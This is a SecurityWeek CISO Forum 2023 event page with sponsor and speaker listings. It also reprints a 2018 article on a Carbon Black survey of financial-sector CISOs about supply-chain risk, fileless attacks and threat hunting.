A SecurityWeek Event

A VIRTUAL EVENT FOR 2023

An Exclusive Forum For
Information Security Leaders

June 13-14th, 2023

2023 Diamond Sponsor

https://www.cisoforum.com/wp-content/uploads/2020/09/Palo_Alto-Networks-logo.png

2023 Platinum Sponsors

https://www.cisoforum.com/wp-content/uploads/2023/05/Abnormal-logo-black.png
https://www.cisoforum.com/wp-content/uploads/2023/05/CardinalOps_Logo.png

2023 Gold Sponsors

https://www.cisoforum.com/wp-content/uploads/2021/08/ReversingLabs_logo.png

ReversingLabs

https://www.cisoforum.com/wp-content/uploads/2023/05/Uptycs-Logo-1-320x95.png

Proofpoint

https://www.cisoforum.com/wp-content/uploads/2023/05/Lacework-Logo-320x53.png

Eclypsium

https://www.cisoforum.com/wp-content/uploads/2023/05/Saviynt-Logo.png

Synopsys

2023 Featured Speakers

Adam Ely

Adam Ely

Fidelity
CISO

Shaun Marion

Shaun Marion

McDonald’s
VP, CISO

Kathy Wang

Kathy Wang

Discord
CSO

Lena Smart

Lena Smart

MongoDB
CISO

Jason Shockey

Jason Shockey

Cenlar FSB
SVP, CISO

Igor Varnava

Igor Varnava

Five9
SVP, CISO

Brian Markham

Brian Markham

EAB
CISO

Chris Castaldo

Chris Castaldo

Crossbean
CISO

Michael Piacente

Michael Piacente

Hitch Partners
Managing Partner

Evan Wolff

Evan Wolff

Crowell & Moring
Partner

Evan Wolff

Jonathan Jaffe

Lemondade
CISO

2023 Agenda is Coming Soon

Designed for senior level cybersecurity leaders to discuss, share and learn innovative information security and risk management strategies, SecurityWeek’s CISO Forum, will take place in 2023 as a virtual event.

Throughout this two-day virtual event, sessions will have a strong focus on participation from CISOs in panel discussions along with talks from industry experts, analysts and other end users, and thought leadership, strategy and technical sessions.

Through a cutting-edge platform, attendees will be able to interact with speakers and sponsors, and visit networking lounges, subject-specific discussion areas, and sponsor booths in a virtual expo hall.


An Exclusive Executive Forum Focused on Cybersecurity Leadership and Strategy

Virtual Event – View Event Website

Throughout this two-day virtual event, sessions will have a strong focus on participation from CISOs in panel discussions along with talks from industry experts, analysts and other end users, and thought leadership, strategy and technical sessions.

Through a cutting-edge platform, attendees will be able to interact with speakers and sponsors, and visit networking lounges, subject-specific discussion areas, and sponsor booths in a virtual expo hall.

Previous CISO Forum Speakers

Adrian Stone

Adrian Stone

Peloton
VP, CISO

Anne Marie Zettlemoyer

Anne Marie Zettlemoyer

Mastercard
VP, Security Engineering

Caleb Sima

Caleb Sima

Robinhood
CISO

Allan Friedman

Allan Friedman

Cybersecurity and Infrastructure Security Agency (CISA)
SBOM Champion

Summer Craze Fowler

Summer Craze Fowler

Argo AI
CISO/CIO

Fredrick Lee

Fredrick ‘Flee’ Lee

Gusto
Chief Security Officer

Shaila Shankar

Shaila Shankar

Cisco
SVP and General Manager of Cisco Cloud Network and Security

Jonathan Jaffe

Jonathan Jaffe

Lemonade
CISO

Aanchal Gupta

Aanchal Gupta

Microsoft
VP, Azure Security

Lena Smart

Lena Smart

MongoDB
CISO

Sounil Yu

Sounil Yu

JupiterOne
CISO

Theresa Payton

Theresa Payton

Former White House CIO
Star of CBS TV series, “Hunted”, and Leading Cybersecurity Expert

CISO Survey Shows Importance of Threat Hunting in the Finance Sector

05/22/2018 0

Attackers Hide in Plain Sight as Threat Hunting Lags

(Kevin Townsend – SecurityWeek) – The finance sector has one of the most robust cybersecurity postures in industry. It is heavily regulated, frequently attacked, and well-resourced — but not immune to cybercriminals. Ninety percent of financial institutions were targeted by ransomware alone in the past 12 months.

Endpoint protection firm Carbon Black surveyed the CISOs of 40 major financial institutions during April 2018 to understand how the finance sector is attacked and what concerns its defenders. Two things most stand out: nearly half (44%) of financial institutions are concerned about the security posture of their technology service providers (TSPs — the supply chain); and despite their resources, only 37% have established threat hunting teams.

Concern over the supply chain is not surprising. Cybercriminals are increasingly attacking third-parties (who may be less well-protected or have their own security issues) to gain access to the primary target. The Federal Deposit Insurance Corporation (FDIC) is also concerned about the supply chain, and has developed an examination process that includes reviewing public information about the TSPs and their software.

One of the areas that concerns the FDIC is consolidation within the service provider industry. “For example,” it notes, “a flawed acquisition strategy may weaken the financial condition of the acquirer, or a poorly planned integration could heighten operational or security risk.”

Carbon Black recommends that this potential risk be countered by hunt teams and defenders closely assessing their TSP security posture. But, it adds, “Given that 63% of financial institutions have yet to establish threat hunting teams, there should be concern regarding limited visibility into exposure created by TSPs.”

But it also considers threat hunting to be important in detecting direct attacks. There are two primary reasons. The first is the increasing tendency for attackers to use fileless attacks that are not easily detected by standard technology; and the second is a growing willingness for attackers to engage in counter-countermeasures; that is, to counter the defender’s incident response.

Fileless attacks are increasing across all industry sectors. A typical attack might involve a Flash vulnerability. Flash invokes PowerShell, feeding instructions via the command line. PowerShell then connects to a stealth C&C server, from where it downloads a more extensive PowerShell script that performs the attack. All of this is done in memory — no malware file is downloaded and there is nothing for traditional technology defenses to detect.

“Active threat hunting,” says Carbon Black, “puts defenders ‘on the offensive’ rather than simply reacting to the deluge of daily alerts.” It “aims to find abnormal activity on servers and endpoints that may be signs of compromise, intrusion or exfiltration of data. Though the concept of threat hunting isn’t new, for many organizations the very idea of threat hunting is.”

But the need for threat hunting goes beyond simple detection of intrusion. “Attackers are able to go off their scripts while defenders are sticking to manual and automated playbooks,” warns Carbon Black. “These playbooks are generally based off simple indicators of compromise (IoCs). As a result, security teams are often left thinking they have disrupted the attacker but, with counter incident response, attackers maintain the upper hand.”

Compounding this, attackers are beginning to incorporate a secondary command and control in case one is discovered or disrupted. Carbon Black notes that this tactic has already been found in 10% of victims, and predicts it is a tactic that will grow in future months. The principal is that an attacker’s ability to improvise and change directions at speed is best countered by a human defender rather than simply a pre-programmed set of incident response steps.

“Financial institutions,” suggests Carbon Black, “should aim to improve situational awareness and visibility into the more advanced attacker movements post breach. This must be accompanied with a tactical paradigm shift from prevention to detection. The increasing attack surface, coupled with the utilization of advanced tactics, has allowed attackers to become invisible. Decreasing dwell time is the true return on investment for any cybersecurity program.”

In reality, of course, this does not just apply to the finance sector. The same evolving methodology is being used by attackers across all industry sectors. The need for threat hunting is not limited to finance. “All sectors should take heed,” Carbon Black chief cybersecurity officer Tom Kellerman told SecurityWeek. “Generally speaking, financial services tend to be the most secure as they’ve come under attack with high-profile attack campaigns in recent years.” The implication is that if the finance sector is slow to switch to active threat hunting, other sectors will be slower.

In April 2018, Carbon Black filed an S-1 registration statement with the U.S. Securities and Exchange Commission (SEC) for a proposed initial public offering (IPO) of its common stock. Shares of the company (NASDAQ: CBLK) jumped 26% on its first day of trading on May 4. The company has a market capitalization of nearly $1.6 billion at the time of publishing. The company emerged in its current form after its purchase by Bit9 in February 2014.


Leave a Reply

Your email address will not be published. Required fields are marked *


Subscribe for Event News